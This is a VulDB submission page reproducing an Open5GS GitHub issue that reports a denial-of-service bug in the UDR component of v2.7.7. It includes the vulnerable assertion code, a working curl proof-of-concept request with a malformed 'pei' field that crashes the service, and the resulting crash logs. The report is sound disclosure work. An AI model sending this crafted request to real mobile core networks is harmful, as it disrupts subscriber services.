| 제목 | Open5gs UDR v2.7.7 Denial of Service |
|---|
| 설명 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
UDR crashes when `PUT /nudr-dr/v1/subscription-data/{supi}/context-data/amf-3gpp-access`
contains a syntactically valid body whose `pei` field lacks the expected
`type-value` separator.
In `udr_nudr_dr_handle_subscription_context()`, the handler does:
```c
type = ogs_id_get_type(pei);
ogs_assert(type);
value = ogs_id_get_value(pei);
ogs_assert(value);
```
For `pei="foo"`, `ogs_id_get_value()` logs `strsep[foo] failed` and returns
`NULL`, so the route aborts on `ogs_assert(value)` before any HTTP error is
returned.
### Steps to reproduce
1. Start the official Open5GS v2.7.7 Docker deployment and make sure the UDR
SBI endpoint is reachable. In my live setup the UDR endpoint was
`http://10.33.33.11:80`.
2. Send the following request:
```bash
payload=$(python3 - <<'PY'
import json
body = {
"amfInstanceId": "amf-test",
"deregCallbackUri": "http://amf.open5gs.org/notify",
"guami": {
"plmnId": {"mcc": "001", "mnc": "01"},
"amfId": "020040"
},
"ratType": "NR",
"pei": "foo"
}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -v \
-X PUT \
http://10.33.33.11/nudr-dr/v1/subscription-data/imsi-001011234567891/context-data/amf-3gpp-access \
-H 'content-type: application/json' \
--data "$payload"
```
3. Check the UDR logs and restart state:
```bash
docker logs --tail 80 udr
docker inspect -f '{{.State.Status}} {{.State.StartedAt}} {{.RestartCount}} {{.State.FinishedAt}}' udr
```
### Logs
```text
curl: (56) Recv failure: Connection reset by peer
```
```text
Open5GS daemon v2.7.7
04/13 16:52:38.451: [app] INFO: Configuration: '/etc/open5gs/custom/udr.yaml' (../lib/app/ogs-init.c:144)
04/13 16:52:38.451: [app] INFO: File Logging: 'var/log/open5gs/udr.log' (../lib/app/ogs-init.c:147)
04/13 16:52:38.454: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/context.c:451)
04/13 16:52:38.455: [dbi] INFO: MongoDB URI: 'mongodb://db.open5gs.org/open5gs' (../lib/dbi/ogs-mongoc.c:130)
04/13 16:52:38.455: [sbi] INFO: NF Service [nudr-dr] (../lib/sbi/context.c:1985)
04/13 16:52:38.455: [sbi] INFO: nghttp2_server() [http://udr.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434)
04/13 16:52:38.455: [app] INFO: UDR initialize...done (../src/udr/app.c:31)
04/13 16:52:38.457: [sbi] INFO: [2dc28aa2-3759-41f1-8b88-75b4d1342f97] NF registered [Heartbeat:10s] (../lib/sbi/nf-sm.c:341)
04/13 16:52:38.457: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/13 16:52:38.457: [sbi] INFO: [2dc3243a-3759-41f1-a1a7-9bea98579840] Subscription created until 2026-04-14T16:52:38.457690+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/13 16:52:40.464: [core] ERROR: strsep[foo] failed (../lib/proto/types.c:353)
04/13 16:52:40.464: [udr] FATAL: udr_nudr_dr_handle_subscription_context: Assertion `value' failed. (../src/udr/nudr-handler.c:309)
04/13 16:52:40.465: [core] FATAL: backtrace() returned 8 addresses (../lib/core/ogs-abort.c:37)
open5gs-udrd(+0x93f3) [0x558165c563f3]
open5gs-udrd(+0x60c0) [0x558165c530c0]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7f27898e1abc]
open5gs-udrd(+0x4e0a) [0x558165c51e0a]
/usr/local/lib/libogscore.so.2(+0x12b4f) [0x7f27898d1b4f]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f2788f0fac3]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f2788fa0a84]
```
### Expected behaviour
UDR should reject malformed `pei` values with a normal client error response.
### Observed Behaviour
The HTTP/2 stream aborts, the UDR process crashes, and the container restarts
automatically.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required.
|
|---|
| 원천 | ⚠️ https://github.com/open5gs/open5gs/issues/4411 |
|---|
| 사용자 | FrankyLin (UID 94345) |
|---|
| 제출 | 2026. 04. 15. PM 04:27 (2 개월 ago) |
|---|
| 모더레이션 | 2026. 05. 03. AM 09:22 (18 days later) |
|---|
| 상태 | 중복 |
|---|
| VulDB 항목 | 360883 [Open5GS 까지 2.7.7 UDR /src/udr/nudr-handler.c udr_nudr_dr_handle_subscription_context pei 서비스 거부] |
|---|
| 포인트들 | 0 |
|---|